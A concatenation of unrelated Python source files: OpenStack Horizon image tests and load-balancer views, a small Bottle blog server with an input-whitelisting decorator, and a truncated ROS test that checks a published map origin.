self.assertEqual(row_actions[1].verbose_name, u"Create Volume")
self.assertEqual(row_actions[2].verbose_name, u"Edit Image")
self.assertEqual(row_actions[3].verbose_name, u"Update Metadata")
self.assertEqual(row_actions[4].verbose_name, u"Delete Image")
row_actions = snaps.get_row_actions(snaps.data[1])
# second instance - status active, not owned
self.assertEqual(len(row_actions), 2)
self.assertEqual(row_actions[0].verbose_name, u"Launch")
self.assertEqual(row_actions[1].verbose_name, u"Create Volume")
row_actions = snaps.get_row_actions(snaps.data[2])
# third instance - status queued, only delete is available
self.assertEqual(len(row_actions), 1)
self.assertEqual(six.text_type(row_actions[0].verbose_name),
u"Delete Image")
self.assertEqual(str(row_actions[0]), "<DeleteImage: delete>")
self.mock_image_list.assert_called_once_with(test.IsHttpRequest(),
marker=None,
paginate=True,
sort_dir='asc',
sort_key='name',
reversed_order=False)
class ImagesAndSnapshotsUtilsTests(BaseImagesTestCase):
def test_list_image(self):
public_images = [image for image in self.images.list()
if image.status == 'active' and image.is_public]
private_images = [image for image in self.images.list()
if (image.status == 'active' and
not image.is_public)]
shared_images = [image for image in self.imagesV2.list()
if (image.status == 'active' and
image.visibility == 'shared')]
community_images = [image for image in self.imagesV2.list()
if (image.status == 'active' and
image.visibility == 'community')]
self.mock_image_list.side_effect = [
[public_images, False, False],
[private_images, False, False],
[community_images, False, False],
[shared_images, False, False]
]
image_calls = [
mock.call(test.IsHttpRequest(),
filters={'is_public': True, 'status': 'active'}),
mock.call(test.IsHttpRequest(),
filters={'property-owner_id': self.tenant.id,
'status': 'active'}),
mock.call(test.IsHttpRequest(),
filters={'visibility': 'community', 'status': 'active'}),
mock.call(test.IsHttpRequest(),
filters={'visibility': 'shared', 'status': 'active'})
]
ret = utils.get_available_images(self.request, self.tenant.id)
expected_images = [image for image in self.images.list()
if (image.status == 'active' and
image.container_format not in ('ami', 'aki'))]
self.mock_image_list.assert_has_calls(image_calls)
self.assertEqual(len(expected_images), len(ret))
def test_list_image_using_cache(self):
public_images = [image for image in self.images.list()
if image.status == 'active' and image.is_public]
private_images = [image for image in self.images.list()
if (image.status == 'active' and
not image.is_public)]
community_images = [image for image in self.imagesV2.list()
if (image.status == 'active' and
image.visibility == 'community')]
shared_images = [image for image in self.imagesV2.list()
if (image.status == 'active' and
image.visibility == 'shared')]
self.mock_image_list.side_effect = [
[public_images, False, False],
[private_images, False, False],
[community_images, False, False],
[shared_images, False, False],
[private_images, False, False]
]
image_calls = [
mock.call(test.IsHttpRequest(),
filters={'is_public': True, 'status': 'active'}),
mock.call(test.IsHttpRequest(),
filters={'property-owner_id': self.tenant.id,
'status': 'active'}),
mock.call(test.IsHttpRequest(),
filters={'visibility': 'community', 'status': 'active'}),
mock.call(test.IsHttpRequest(),
filters={'visibility': 'shared', 'status': 'active'}),
mock.call(test.IsHttpRequest(),
filters={'property-owner_id': 'other-tenant',
'status': 'active'})
]
expected_images = [image for image in self.images.list()
if (image.status == 'active' and
image.container_format not in ('ari', 'aki'))]
images_cache = {}
ret = utils.get_available_images(self.request, self.tenant.id,
images_cache)
self.assertEqual(len(expected_images), len(ret))
self.assertEqual(
len(public_images),
len(images_cache['public_images']))
self.assertEqual(1, len(images_cache['images_by_project']))
self.assertEqual(
len(private_images),
len(images_cache['images_by_project'][self.tenant.id]))
self.assertEqual(
len(community_images),
len(images_cache['community_images']))
self.assertEqual(
len(shared_images),
len(images_cache['shared_images']))
ret = utils.get_available_images(self.request, self.tenant.id,
images_cache)
self.assertEqual(len(expected_images), len(ret))
# image list for other-tenant
ret = utils.get_available_images(self.request, 'other-tenant',
images_cache)
self.assertEqual(len(expected_images), len(ret))
self.assertEqual(
len(public_images),
len(images_cache['public_images']))
self.assertEqual(2, len(images_cache['images_by_project']))
self.assertEqual(
len(private_images),
len(images_cache['images_by_project']['other-tenant']))
self.mock_image_list.assert_has_calls(image_calls)
@mock.patch.object(exceptions, 'handle')
def test_list_image_error_public_image_list(self, mock_exception_handle):
private_images = [image for image in self.images.list()
if (image.status == 'active' and
not image.is_public)]
community_images = [image for image in self.imagesV2.list()
if (image.status == 'active' and
image.visibility == 'community')]
shared_images = [image for image in self.imagesV2.list()
if (image.status == 'active' and
image.visibility == 'shared')]
self.mock_image_list.side_effect = [
self.exceptions.glance,
[private_images, False, False],
[community_images, False, False],
[shared_images, False, False]
]
images_cache = {}
ret = utils.get_available_images(self.request, self.tenant.id,
images_cache)
image_calls = [
mock.call(test.IsHttpRequest(),
filters={'is_public': True, 'status': 'active'}),
mock.call(test.IsHttpRequest(),
filters={'status': 'active', 'property-owner_id': '1'}),
mock.call(test.IsHttpRequest(),
filters={'visibility': 'community', 'status': 'active'}),
mock.call(test.IsHttpRequest(),
filters={'visibility': 'shared', 'status': 'active'})
]
self.mock_image_list.assert_has_calls(image_calls)
mock_exception_handle.assert_called_once_with(
test.IsHttpRequest(),
"Unable to retrieve public images.")
expected_images = [image for image in private_images
if image.container_format not in ('ami', 'aki')]
self.assertEqual(len(expected_images), len(ret))
self.assertNotIn('public_images', images_cache)
self.assertEqual(1, len(images_cache['images_by_project']))
self.assertEqual(
len(private_images),
len(images_cache['images_by_project'][self.tenant.id]))
self.assertEqual(
len(community_images),
len(images_cache['community_images']))
self.assertEqual(
len(shared_images),
len(images_cache['shared_images']))
@mock.patch.object(exceptions, 'handle')
def test_list_image_error_private_image_list(self, mock_exception_handle):
public_images = [image for image in self.images.list()
if image.status == 'active' and image.is_public]
private_images = [image for image in self.images.list()
if (image.status == 'active' and
not image.is_public)]
community_images = [image for image in self.imagesV2.list()
if (image.status == 'active' and
image.visibility == 'community')]
shared_images = [image for image in self.imagesV2.list()
if (image.status == 'active' and
image.visibility == 'shared')]
self.mock_image_list.side_effect = [
[public_images, False, False],
self.exceptions.glance,
[community_images, False, False],
[shared_images, False, False],
[private_images, False, False]
]
images_cache = {}
ret = utils.get_available_images(self.request, self.tenant.id,
images_cache)
expected_images = [image for image in public_images
if image.container_format not in ('ami', 'aki')]
self.assertEqual(len(expected_images), len(ret))
self.assertEqual(
len(public_images),
len(images_cache['public_images']))
self.assertFalse(len(images_cache['images_by_project']))
self.assertEqual(
len(community_images),
len(images_cache['community_images']))
self.assertEqual(
len(shared_images),
len(images_cache['shared_images']))
ret = utils.get_available_images(self.request, self.tenant.id,
images_cache)
expected_images = [image for image in self.images.list()
if image.container_format not in ('ami', 'aki')]
self.assertEqual(len(expected_images), len(ret))
self.assertEqual(
len(public_images),
len(images_cache['public_images']))
self.assertEqual(1, len(images_cache['images_by_project']))
self.assertEqual(
len(private_images),
len(images_cache['images_by_project'][self.tenant.id]))
self.assertEqual(
len(community_images),
len(images_cache['community_images']))
self.assertEqual(
len(shared_images),
len(images_cache['shared_images']))
image_calls = [
mock.call(test.IsHttpRequest(),
filters={'status': 'active', 'is_public': True}),
mock.call(test.IsHttpRequest(),
filters={'status': 'active', 'property-owner_id': '1'}),
mock.call(test.IsHttpRequest(),
filters={'status': 'active', 'visibility': 'community'}),
mock.call(test.IsHttpRequest(),
filters={'status': 'active', 'visibility': 'shared'}),
mock.call(test.IsHttpRequest(),
filters={'status': 'active', 'property-owner_id': '1'})
]
self.mock_image_list.assert_has_calls(image_calls)
mock_exception_handle.assert_called_once_with(
test.IsHttpRequest(),
"Unable to retrieve images for the current project.")
class SeleniumTests(test.SeleniumTestCase):
@test.create_mocks({api.glance: ('image_list_detailed',)})
def test_modal_create_image_from_url(self):
driver = self.selenium
images = self.images.list()
self.mock_image_list_detailed.return_value = [images, False, False]
driver.get("%s%s" % (self.live_server_url, INDEX_URL))
# Open the modal menu
driver.find_element_by_id("images__action_create").click()
wait = self.ui.WebDriverWait(self.selenium, 10,
ignored_exceptions=[socket_timeout])
wait.until(lambda x: driver.find_element_by_id("id_disk_format"))
driver.find_element_by_xpath('//a[@data-select-value="url"]').click()
copyfrom = driver.find_element_by_id("id_image_url")
copyfrom.send_keys("http://www.test.com/test.iso")
formats = self.ui.Select(driver.find_element_by_id("id_disk_format"))
body = formats.first_selected_option
self.assertIn("ISO", body.text,
"ISO should be selected when the extension is *.iso")
self.assertEqual(3, self.mock_image_list_detailed.call_count)
self.mock_image_list_detailed.assert_has_calls([
mock.call(test.IsHttpRequest(), marker=None, paginate=True,
reversed_order=False, sort_dir='asc', sort_key='name'),
mock.call(test.IsHttpRequest(), filters={'disk_format': 'aki'}),
mock.call(test.IsHttpRequest(), filters={'disk_format': 'ari'}),
])
@unittest.skipIf(os.environ.get('SELENIUM_PHANTOMJS'),
"PhantomJS cannot test file upload widgets.")
@test.create_mocks({api.glance: ('image_list_detailed',)})
def test_modal_create_image_from_file(self):
driver = self.selenium
images = self.images.list()
self.mock_image_list_detailed.return_value = [images, False, False]
driver.get("%s%s" % (self.live_server_url, INDEX_URL))
# Open the modal menu
driver.find_element_by_id("images__action_create").click()
wait = self.ui.WebDriverWait(driver, 10,
ignored_exceptions=[socket_timeout])
wait.until(lambda x: driver.find_element_by_id("id_disk_format"))
driver.find_element_by_xpath('//a[@data-select-value="file"]').click()
with tempfile.NamedTemporaryFile() as tmp:
driver.find_element_by_id("id_image_file").send_keys(tmp.name)
formats = self.ui.Select(driver.find_element_by_id("id_disk_format"))
formats.select_by_visible_text('ISO - Optical Disk Image')
body = formats.first_selected_option
self.assertIn("ISO", body.text,
"ISO should be selected when the extension is *.iso")
self.assertEqual(3, self.mock_image_list_detailed.call_count)
self.mock_image_list_detailed.assert_has_calls([
mock.call(test.IsHttpRequest(), marker=None, paginate=True,
reversed_order=False, sort_dir='asc', sort_key='name'),
mock.call(test.IsHttpRequest(), filters={'disk_format': 'aki'}),
mock.call(test.IsHttpRequest(), filters={'disk_format': 'ari'}),
])
@test.create_mocks({api.glance: ('image_list_detailed',)})
def test_create_image_from_url(self):
driver = self.selenium
self.mock_image_list_detailed.return_value = [self.images.list(),
False, False]
driver.get("%s%s" % (self.live_server_url, CREATE_URL))
wait = self.ui.WebDriverWait(driver, 10,
ignored_exceptions=[socket_timeout])
wait.until(lambda x: driver.find_element_by_id("id_disk_format"))
driver.find_element_by_xpath('//a[@data-select-value="url"]').click()
copyfrom = driver.find_element_by_id("id_image_url")
copyfrom.send_keys("http://www.test.com/test.iso")
formats = self.ui.Select(driver.find_element_by_id("id_disk_format"))
formats.select_by_visible_text('ISO - Optical Disk Image')
body = formats.first_selected_option
self.assertIn("ISO", body.text,
"ISO should be selected when the extension is *.iso")
self.assertEqual(2, self.mock_image_list_detailed.call_count)
self.mock_image_list_detailed.assert_has_calls([
mock.call(test.IsHttpRequest(), filters={'disk_format': 'aki'}),
mock.call(test.IsHttpRequest(), filters={'disk_format': 'ari'}),
])
@unittest.skipIf(os.environ.get('SELENIUM_PHANTOMJS'),
"PhantomJS cannot test file upload widgets.")
@test.create_mocks({api.glance: ('image_list_detailed',)})
def test_create_image_from_file(self):
driver = self.selenium
self.mock_image_list_detailed.return_value = [self.images.list(),
False, False]
driver.get("%s%s" % (self.live_server_url, CREATE_URL))
wait = self.ui.WebDriverWait(driver, 10,
ignored_exceptions=[socket_timeout])
wait.until(lambda x: driver.find_element_by_id("id_disk_format"))
driver.find_element_by_xpath('//a[@data-select-value="file"]').click()
with tempfile.NamedTemporaryFile() as tmp:
driver.find_element_by_id("id_image_file").send_keys(tmp.name)
formats = self.ui.Select(driver.find_element_by_id("id_disk_format"))
formats.select_by_visible_text('ISO - Optical Disk Image')
body = formats.first_selected_option
self.assertIn("ISO", body.text,
"ISO should be selected when the extension is *.iso")
self.assertEqual(2, self.mock_image_list_detailed.call_count)
self.mock_image_list_detailed.assert_has_calls([
mock.call(test.IsHttpRequest(), filters={'disk_format': 'aki'}),
mock.call(test.IsHttpRequest(), filters={'disk_format': 'ari'}),
])
|
|
#!/usr/bin/env python3
import functools
import os
import string
import urllib.parse
from blog import Blog
from bottle import route, run, template, jinja2_view, url, Jinja2Template, response
from utilities import Log
# ----- INITIALIZE THE BLOG ----- #
# I'm not sure I'm happy with this, but making it all static doesn't seem much better.
blog_instance = Blog()
blog_instance.parseArticles()
blog_instance.parseStagedArticles()
# ----- SET UP THE TEMPLATE ENGINE ----- #
Jinja2Template.defaults = {
'url': url,
'blog': blog_instance,
}
# ----- SET UP HELPER FUNCTIONS ----- #
# Convenience function to set up views from the right directory
view = functools.partial(jinja2_view, template_lookup=['views'])
def sanitize(callback):
    '''
    Make sure all string arguments to the wrapped function only contain
    whitelisted characters; string arguments are URL-unquoted before being
    checked and passed on.
    :param callback: The function to sanitize.
    '''
    def sanitized_callback(*args, **kwargs):
        #TODO: read from config? It'd be nice but I don't imagine it changing much.
        whitelist = string.ascii_letters + string.digits + '_' + '-' + ' '
        def _check(value):
            # Unquote the value and verify every character is whitelisted.
            value = urllib.parse.unquote(value)
            for char in value:
                if char not in whitelist:
                    Log("Invalid post character: %s" % (value,))
                    return None
            return value
        sanitized_args = []
        sanitized_kwargs = {}
        for arg in args:
            if isinstance(arg, str):
                arg = _check(arg)
                if arg is None:
                    response.status = 303
                    response.set_header('Location', '/error')
                    return {}
            sanitized_args.append(arg)
        for (key, value) in kwargs.items():
            if isinstance(value, str):
                value = _check(value)
                if value is None:
                    response.status = 303
                    response.set_header('Location', '/error')
                    return {}
            sanitized_kwargs[key] = value
        return callback(*sanitized_args, **sanitized_kwargs)
    return sanitized_callback
def make_link(destination, text=None):
'''
Convenience function, generate the HTML for a link.
:param destination: the location of the link.
:param text: the alt text of the link. (default = destination)
'''
if not text:
text = destination
return "<a href=\"%s\">%s</a>" % (destination, text)
# ----- ROUTES ----- #
@route("/")
@sanitize
@view("articleList.tpl")
def root():
blog_instance.parseArticles()
recent_articles = blog_instance.getRecentArticles()
return {'article_list': recent_articles}
@route("/articles/<post>")
@sanitize
@view("basePage.tpl")
def article(post):
article = blog_instance.getArticle(post)
return {'content': article.body}
@route("/staging")
@sanitize
@view("articleList.tpl")
def searchStagedArticles(post=None):
blog_instance.parseStagedArticles()
return {'article_list': blog_instance.getStagedArticles()}
@route("/staging/<post>")
@sanitize
@view("basePage.tpl")
def viewStagedArticle(post):
staged_article = blog_instance.getStagedArticle(post)
return {'content': staged_article.body}
@route("/deploy/<post>")
@sanitize
@view("basePage.tpl")
def deployStagedArticle(post):
deploy_count = blog_instance.deploy(post)
if deploy_count > 0:
response.status = 303
response.set_header('Location', '/articles/' + post)
return {}
response.status = 303
response.set_header('Location', '/error')
return {}
@route("/<year:int>")
@route("/<year:int>/<month:int>")
@route("/<year:int>/<month:int>/<day:int>")
@sanitize
@view("articleList.tpl")
def searchByDate(year, month=None, day=None):
# Do the right thing no matter which parts of the date are given.
if day:
articles = blog_instance.articles_by_date[year][month][day].values()
elif month:
articles = []
for day in blog_instance.articles_by_date[year][month]:
articles += blog_instance.articles_by_date[year][month][day].values()
else:
articles = []
for month in blog_instance.articles_by_date[year]:
for day in blog_instance.articles_by_date[year][month]:
articles += blog_instance.articles_by_date[year][month][day].values()
return {"article_list": articles}
@route("/category/<category>")
@sanitize
@view("articleList.tpl")
def searchByCategory(category):
articles = blog_instance.getArticlesByCategory(category)
return {"article_list": articles}
@route("/category")
@sanitize
@view("basePage.tpl")
def searchCategories():
content = [make_link("/category/" + tag, tag) + "<br>" for tag in blog_instance.getCategories()]
return {"content": "".join(content)}
@route("/tag/<tag>")
@sanitize
@view("articleList.tpl")
def searchByTag(tag):
articles = blog_instance.getArticlesByTag(tag)
return {"article_list": articles}
@route("/tag")
@sanitize
@view("basePage.tpl")
def searchTags():
content = [make_link("/tag/" + tag, tag) + "<br>" for tag in blog_instance.getTags()]
return {"content": "".join(content)}
@route("/error")
@sanitize
@view("basePage.tpl")
def errorPage():
return {"content": "Something happened. See server logs to find out what."}
def Run(host="localhost", port="80", config_path=None):
'''
Run the web server for the site specified by the routes in this module.
:param config_path: Optional additional or alternate configuration file.
'''
if config_path:
blog_instance.loadConfig(config_path)
run(host=host, port=port)
if __name__=="__main__":
Run()
|
|
# Copyright 2013, Big Switch Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django.core.urlresolvers import reverse
from django.core.urlresolvers import reverse_lazy
from django.utils.translation import ugettext_lazy as _
from horizon import exceptions
from horizon import forms
from horizon import tabs
from horizon.utils import memoized
from horizon import workflows
from openstack_dashboard import api
from openstack_dashboard.dashboards.project.loadbalancers \
import forms as project_forms
from openstack_dashboard.dashboards.project.loadbalancers \
import tables as project_tables
from openstack_dashboard.dashboards.project.loadbalancers \
import tabs as project_tabs
from openstack_dashboard.dashboards.project.loadbalancers import utils
from openstack_dashboard.dashboards.project.loadbalancers \
import workflows as project_workflows
class IndexView(tabs.TabbedTableView):
tab_group_class = (project_tabs.LoadBalancerTabs)
template_name = 'project/loadbalancers/details_tabs.html'
page_title = _("Load Balancer")
class AddPoolView(workflows.WorkflowView):
workflow_class = project_workflows.AddPool
class AddVipView(workflows.WorkflowView):
workflow_class = project_workflows.AddVip
def get_initial(self):
initial = super(AddVipView, self).get_initial()
initial['pool_id'] = self.kwargs['pool_id']
try:
pool = api.lbaas.pool_get(self.request, initial['pool_id'])
initial['subnet'] = api.neutron.subnet_get(
self.request, pool.subnet_id).cidr
except Exception as e:
initial['subnet'] = ''
msg = _('Unable to retrieve pool subnet. %s') % e
exceptions.handle(self.request, msg)
return initial
class AddMemberView(workflows.WorkflowView):
workflow_class = project_workflows.AddMember
class AddMonitorView(workflows.WorkflowView):
workflow_class = project_workflows.AddMonitor
class PoolDetailsView(tabs.TabView):
tab_group_class = project_tabs.PoolDetailsTabs
template_name = 'project/loadbalancers/details_tabs.html'
page_title = _("Pool Details")
@memoized.memoized_method
def get_data(self):
pid = self.kwargs['pool_id']
try:
pool = api.lbaas.pool_get(self.request, pid)
except Exception:
pool = []
exceptions.handle(self.request,
_('Unable to retrieve pool details.'))
else:
for monitor in pool.health_monitors:
display_name = utils.get_monitor_display_name(monitor)
setattr(monitor, 'display_name', display_name)
return pool
def get_context_data(self, **kwargs):
context = super(PoolDetailsView, self).get_context_data(**kwargs)
pool = self.get_data()
context['pool'] = pool
table = project_tables.PoolsTable(self.request)
context["url"] = self.get_redirect_url()
context["actions"] = table.render_row_actions(pool)
return context
def get_tabs(self, request, *args, **kwargs):
pool = self.get_data()
return self.tab_group_class(self.request, pool=pool, **kwargs)
@staticmethod
def get_redirect_url():
return reverse_lazy("horizon:project:loadbalancers:index")
class VipDetailsView(tabs.TabView):
tab_group_class = project_tabs.VipDetailsTabs
template_name = 'project/loadbalancers/details_tabs.html'
page_title = _("VIP Details")
class MemberDetailsView(tabs.TabView):
tab_group_class = project_tabs.MemberDetailsTabs
template_name = 'project/loadbalancers/details_tabs.html'
page_title = _("Member Details")
@memoized.memoized_method
def get_data(self):
mid = self.kwargs['member_id']
try:
return api.lbaas.member_get(self.request, mid)
except Exception:
exceptions.handle(self.request,
_('Unable to retrieve member details.'))
def get_context_data(self, **kwargs):
context = super(MemberDetailsView, self).get_context_data(**kwargs)
member = self.get_data()
context['member'] = member
table = project_tables.MembersTable(self.request)
context["url"] = self.get_redirect_url()
context["actions"] = table.render_row_actions(member)
return context
def get_tabs(self, request, *args, **kwargs):
member = self.get_data()
return self.tab_group_class(request, member=member, **kwargs)
@staticmethod
def get_redirect_url():
return reverse_lazy("horizon:project:loadbalancers:index")
class MonitorDetailsView(tabs.TabView):
tab_group_class = project_tabs.MonitorDetailsTabs
template_name = 'project/loadbalancers/details_tabs.html'
page_title = _("Monitor Details")
@memoized.memoized_method
def get_data(self):
mid = self.kwargs['monitor_id']
try:
return api.lbaas.pool_health_monitor_get(self.request, mid)
except Exception:
exceptions.handle(self.request,
_('Unable to retrieve monitor details.'))
def get_context_data(self, **kwargs):
context = super(MonitorDetailsView, self).get_context_data(**kwargs)
monitor = self.get_data()
context['monitor'] = monitor
table = project_tables.MonitorsTable(self.request)
context["url"] = self.get_redirect_url()
context["actions"] = table.render_row_actions(monitor)
return context
def get_tabs(self, request, *args, **kwargs):
monitor = self.get_data()
return self.tab_group_class(request, monitor=monitor, **kwargs)
@staticmethod
def get_redirect_url():
return reverse_lazy("horizon:project:loadbalancers:index")
class UpdatePoolView(forms.ModalFormView):
form_class = project_forms.UpdatePool
form_id = "update_pool_form"
modal_header = _("Edit Pool")
template_name = "project/loadbalancers/updatepool.html"
context_object_name = 'pool'
submit_label = _("Save Changes")
submit_url = "horizon:project:loadbalancers:updatepool"
success_url = reverse_lazy("horizon:project:loadbalancers:index")
page_title = _("Edit Pool")
def get_context_data(self, **kwargs):
context = super(UpdatePoolView, self).get_context_data(**kwargs)
context["pool_id"] = self.kwargs['pool_id']
args = (self.kwargs['pool_id'],)
context['submit_url'] = reverse(self.submit_url, args=args)
return context
@memoized.memoized_method
def _get_object(self, *args, **kwargs):
pool_id = self.kwargs['pool_id']
try:
return api.lbaas.pool_get(self.request, pool_id)
except Exception as e:
redirect = self.success_url
msg = _('Unable to retrieve pool details. %s') % e
exceptions.handle(self.request, msg, redirect=redirect)
def get_initial(self):
pool = self._get_object()
return {'name': pool['name'],
'pool_id': pool['id'],
'description': pool['description'],
'lb_method': pool['lb_method'],
'admin_state_up': pool['admin_state_up']}
class UpdateVipView(forms.ModalFormView):
form_class = project_forms.UpdateVip
form_id = "update_vip_form"
modal_header = _("Edit VIP")
template_name = "project/loadbalancers/updatevip.html"
context_object_name = 'vip'
submit_label = _("Save Changes")
submit_url = "horizon:project:loadbalancers:updatevip"
success_url = reverse_lazy("horizon:project:loadbalancers:index")
page_title = _("Edit VIP")
def get_context_data(self, **kwargs):
context = super(UpdateVipView, self).get_context_data(**kwargs)
context["vip_id"] = self.kwargs['vip_id']
args = (self.kwargs['vip_id'],)
context['submit_url'] = reverse(self.submit_url, args=args)
return context
@memoized.memoized_method
def _get_object(self, *args, **kwargs):
vip_id = self.kwargs['vip_id']
try:
return api.lbaas.vip_get(self.request, vip_id)
except Exception as e:
redirect = self.success_url
msg = _('Unable to retrieve VIP details. %s') % e
exceptions.handle(self.request, msg, redirect=redirect)
def get_initial(self):
vip = self._get_object()
persistence = getattr(vip, 'session_persistence', None)
if persistence:
stype = persistence['type']
if stype == 'APP_COOKIE':
cookie = persistence['cookie_name']
else:
cookie = ''
else:
stype = ''
cookie = ''
return {'name': vip['name'],
'vip_id': vip['id'],
'description': vip['description'],
'pool_id': vip['pool_id'],
'session_persistence': stype,
'cookie_name': cookie,
'connection_limit': vip['connection_limit'],
'admin_state_up': vip['admin_state_up']}
class UpdateMemberView(forms.ModalFormView):
form_class = project_forms.UpdateMember
form_id = "update_pool_form"
modal_header = _("Edit Member")
template_name = "project/loadbalancers/updatemember.html"
context_object_name = 'member'
submit_label = _("Save Changes")
submit_url = "horizon:project:loadbalancers:updatemember"
success_url = reverse_lazy("horizon:project:loadbalancers:index")
page_title = _("Edit Member")
def get_context_data(self, **kwargs):
context = super(UpdateMemberView, self).get_context_data(**kwargs)
context["member_id"] = self.kwargs['member_id']
args = (self.kwargs['member_id'],)
context['submit_url'] = reverse(self.submit_url, args=args)
return context
@memoized.memoized_method
def _get_object(self, *args, **kwargs):
member_id = self.kwargs['member_id']
try:
return api.lbaas.member_get(self.request, member_id)
except Exception as e:
redirect = self.success_url
msg = _('Unable to retrieve member details. %s') % e
exceptions.handle(self.request, msg, redirect=redirect)
def get_initial(self):
member = self._get_object()
return {'member_id': member['id'],
'pool_id': member['pool_id'],
'weight': member['weight'],
'admin_state_up': member['admin_state_up']}
class UpdateMonitorView(forms.ModalFormView):
form_class = project_forms.UpdateMonitor
form_id = "update_monitor_form"
modal_header = _("Edit Monitor")
template_name = "project/loadbalancers/updatemonitor.html"
context_object_name = 'monitor'
submit_label = _("Save Changes")
submit_url = "horizon:project:loadbalancers:updatemonitor"
success_url = reverse_lazy("horizon:project:loadbalancers:index")
page_title = _("Edit Monitor")
def get_context_data(self, **kwargs):
context = super(UpdateMonitorView, self).get_context_data(**kwargs)
context["monitor_id"] = self.kwargs['monitor_id']
args = (self.kwargs['monitor_id'],)
context['submit_url'] = reverse(self.submit_url, args=args)
return context
@memoized.memoized_method
def _get_object(self, *args, **kwargs):
monitor_id = self.kwargs['monitor_id']
try:
return api.lbaas.pool_health_monitor_get(self.request, monitor_id)
except Exception as e:
redirect = self.success_url
msg = _('Unable to retrieve health monitor details. %s') % e
exceptions.handle(self.request, msg, redirect=redirect)
def get_initial(self):
monitor = self._get_object()
return {'monitor_id': monitor['id'],
'delay': monitor['delay'],
'timeout': monitor['timeout'],
'max_retries': monitor['max_retries'],
'admin_state_up': monitor['admin_state_up']}
class AddPMAssociationView(workflows.WorkflowView):
workflow_class = project_workflows.AddPMAssociation
def get_initial(self):
initial = super(AddPMAssociationView, self).get_initial()
initial['pool_id'] = self.kwargs['pool_id']
try:
pool = api.lbaas.pool_get(self.request, initial['pool_id'])
initial['pool_name'] = pool.name
initial['pool_monitors'] = pool.health_monitors
except Exception as e:
msg = _('Unable to retrieve pool. %s') % e
exceptions.handle(self.request, msg)
return initial
class DeletePMAssociationView(workflows.WorkflowView):
workflow_class = project_workflows.DeletePMAssociation
def get_initial(self):
initial = super(DeletePMAssociationView, self).get_initial()
initial['pool_id'] = self.kwargs['pool_id']
try:
pool = api.lbaas.pool_get(self.request, initial['pool_id'])
initial['pool_name'] = pool.name
initial['pool_monitors'] = pool.health_monitors
except Exception as e:
msg = _('Unable to retrieve pool. %s') % e
exceptions.handle(self.request, msg)
return initial
|
|
#!/usr/bin/env python
# Software License Agreement (BSD License)
#
# Copyright (c) 2017, Southwest Research Institute (SwRI)
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of Southwest Research Institute (SwRI) nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL SOUTHWEST RESEARCH INSTITUTE BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
import sys
import time
import unittest
from geographic_msgs.msg import GeoPose, GeoPoseStamped
from geometry_msgs.msg import PoseStamped
from gps_common.msg import GPSFix, GPSStatus
from sensor_msgs.msg import NavSatFix, NavSatStatus
import rospy
import rostest
import rostopic
import tf.transformations
PKG = 'swri_transform_util'
NAME = 'test_initialize_origin'
ORIGIN_TOPIC = '/local_xy_origin'
ORIGIN_TYPES = [PoseStamped, GPSFix, GeoPose, GeoPoseStamped]
msg_stamp = rospy.Time(1337, 0xDEADBEEF)
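# Reference coordinates that the origin republished on ORIGIN_TOPIC is checked
# against in the tests below.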
swri = {
'latitude': 29.45196669,
'longitude': -98.61370577,
'altitude': 233.719,
'heading': 90
}
class TestInitializeOrigin(unittest.TestCase):
def subscribeToOrigin(self):
# This line blocks until initialize_origin is alive and has advertised the origin topic
origin_class = rostopic.get_topic_class(ORIGIN_TOPIC, blocking=True)[0]
rospy.loginfo("Origin is a " + origin_class._type + " message")
self.assertIsNotNone(origin_class, msg=ORIGIN_TOPIC+" was never advertised")
self.assertIn(origin_class, ORIGIN_TYPES)
self.test_stamp = False # Enable this for auto origin
self.got_origin = False
return rospy.Subscriber(ORIGIN_TOPIC, origin_class, self.originCallback)
def originCallback(self, msg):
rospy.loginfo("Callback received a " + msg._type + " message.")
self.got_origin = True
if msg._type == PoseStamped._type:
latitude = msg.pose.position.y
longitude = msg.pose.position.x
altitude = msg.pose.position.z
quaternion = (msg.pose.orientation.x,
msg.pose.orientation.y,
msg.pose.orientation.z,
msg.pose.orientation.w)
euler = tf.transformations.euler_from_quaternion(quaternion)
yaw = euler[2]
self.assertAlmostEqual(yaw, 0)
elif msg._type == GPSFix._type:
rospy.loginfo("Status: %d" % msg.status.status)
self.assertEqual(msg.status.status, GPSStatus.STATUS_FIX)
latitude = msg.latitude
longitude = msg.longitude
altitude = msg.altitude
self.assertAlmostEqual(msg.track, swri['heading'])
elif msg._type == NavSatFix._type:
rospy.loginfo("Status: %d" % msg.status.status)
self.assertEqual(msg.status.status, NavSatStatus.STATUS_FIX)
latitude = msg.latitude
longitude = msg.longitude
altitude = msg.altitude
else: # msg._type == GeoPose._type:
latitude = msg.position.latitude
longitude = msg.position.longitude
altitude = msg.position.altitude
quaternion = (msg.pose.orientation.x,
msg.pose.orientation.y,
msg.pose.orientation.z,
msg.pose.orientation.w)
euler = tf.transformations.euler_from_quaternion(quaternion)
yaw = euler[2]
